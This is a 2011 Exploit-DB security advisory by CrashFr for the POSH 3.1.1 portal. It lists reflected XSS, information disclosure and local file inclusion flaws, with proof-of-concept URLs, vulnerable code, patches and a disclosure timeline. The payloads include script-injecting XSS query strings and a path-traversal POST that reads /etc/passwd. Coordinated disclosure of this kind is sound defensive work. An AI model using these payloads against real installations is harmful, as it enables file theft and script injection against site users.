POSH – Multiple Vulnerabilities

  • 作者: Crashfr
    日期: 2011-10-10
  • 类别:
  • 来源:https://www.exploit-db.com/exploits/17959/
  • # Exploit Title: POSH <= 3.1.1 Multiple Vulnerabilities
    # Date: 10/10/2011
    # Author: CrashFr
    # Software Link: http://sourceforge.net/projects/posh/
    # Version: 3.1.1
    # Tested on: Linux
    //----- Advisory
    Program: POSH 3.1.1 and prior
    Vendor : www.portaneo.com
    Homepage : http://sourceforge.net/projects/posh/
    Discovery: 2011/09/19
    Author Contacted : 2011/09/20
    Found by : CrashFr
    This Advisory: CrashFr
    //----- Application description
    POSH (Portaneo Open Source Homepage) is a personalizable interface (Netvibes, iGoogle) that can be used in a web application or educational / enterprise intranet context. Enterprise version adds social network, notebooks and search feature.
    //----- Description of vulnerability
    Local File Inclusion, Cross-Site Scripting (XSS) and Information Disclosure vulnerabilities were identified within POSH version 3.1.1
    //----- Proof Of Concept
    --- Information disclosure ---
    - http://localhost/posh/portal/login.php?lang=fr-en
    	- Vulnerability at includes/sessions.inc.php
    		if (preg_match( '/^[a-z]{2}$/', $_GET["lang"] ) || preg_match( '/^[a-z]{2}\-[a-z]{2}$/', $_GET["lang"] )) {
    			$_SESSION['lang'] = $_GET["lang"];
    		if ((preg_match( '/^[a-z]{2}$/', $_GET["lang"] ) || preg_match( '/^[a-z]{2}\-[a-z]{2}$/', $_GET["lang"] )) && is_file('../l10n/'.$_GET["lang"].'/lang.php')) {
    			$_SESSION['lang'] = $_GET["lang"];
    --- XSS ---
    - http://localhost/posh/portal/login.php?message=XSS%20Catched%20!%22%29%29;alert%28%22XSS%22%29;//
    	- Vulnerability at: templates/default/login.php line 42
    		Replace: if ($message!='') echo '<font color="#ff0000"><script type="text/javascript">document.write(lg("'.$message.'"));</script></font><br /><br />';
    		By: if ($message!='') echo '<font color="#ff0000"><script type="text/javascript">document.write(lg("'.htmlspecialchars($message).'"));</script></font><br /><br />';
    - http://localhost/posh/admin/login.php?extid=ok%22%3E%3Cscript%3Ealert%28%27XSS%27%29;%3C/script%3E
    	- Vulnerability at: templates/default/login_adminsimplified.php line 93
    		Replace: <input type="hidden" name="extid" maxlength="16" value="<?php echo $extid; ?>" class="thinbox" />
    		By: <input type="hidden" name="extid" maxlength="16" value="<?php if(is_int($extid)){ echo $extid; } ?>" class="thinbox" />
    - http://localhost/posh/admin/index.php?extid=1%29;alert%28%27XSS%27
    	- Vulnerability at: templates/default/index_adminsimplified.php line 67 and 70
    		Replace: $p.admin.widgets.loadModExtId(<?php echo $extid; ?>);
    		By: $p.admin.widgets.loadModExtId(<?php if(is_int($extid)){ echo $extid; } ?>);
    		Replace: $p.admin.widgets.refreshIcons(icon,<?php echo $extid; ?>);
    		By: $p.admin.widgets.refreshIcons(icon,<?php if(is_int($extid)){ echo $extid; } ?>);
    --- Local File Inclusion ---
    - http://localhost/posh/portal/scr_changelang.php => POST lang=../../../../../../etc/passwd%00
    	POST http://localhost/posh/portal/scr_changelang.php HTTP/1.1
    	- Call http://localhost/posh/portal/moduleff.php for example to see the result (a lot of page use __LANG to include lang file)
    	- Vulnerability at portal/scr_changelang.php line 67
    		Replace: $_SESSION['lang']=$lang;
    		By: if ((preg_match( '/^[a-z]{2}$/', $_GET["lang"] ) || preg_match( '/^[a-z]{2}\-[a-z]{2}$/', $_GET["lang"] )) && is_file('../l10n/'.$_GET["lang"].'/lang.php')) {
    //----- Solution
    Apply patchs
    Upgrade POSH to 3.1.2
    //----- Vulnerability Timeline
    2011-09-20 - Reported to vendor
    2011-09-21 - Vendor Reply
    2011-09-25 - Vendor released POSH 3.1.2
    2011-10-10 - Vulnerability Disclosed
    //----- Credits
    crashfr at sysdream dot com
    //----- Greetings
    HZV (http://www.hackerzvoice.net)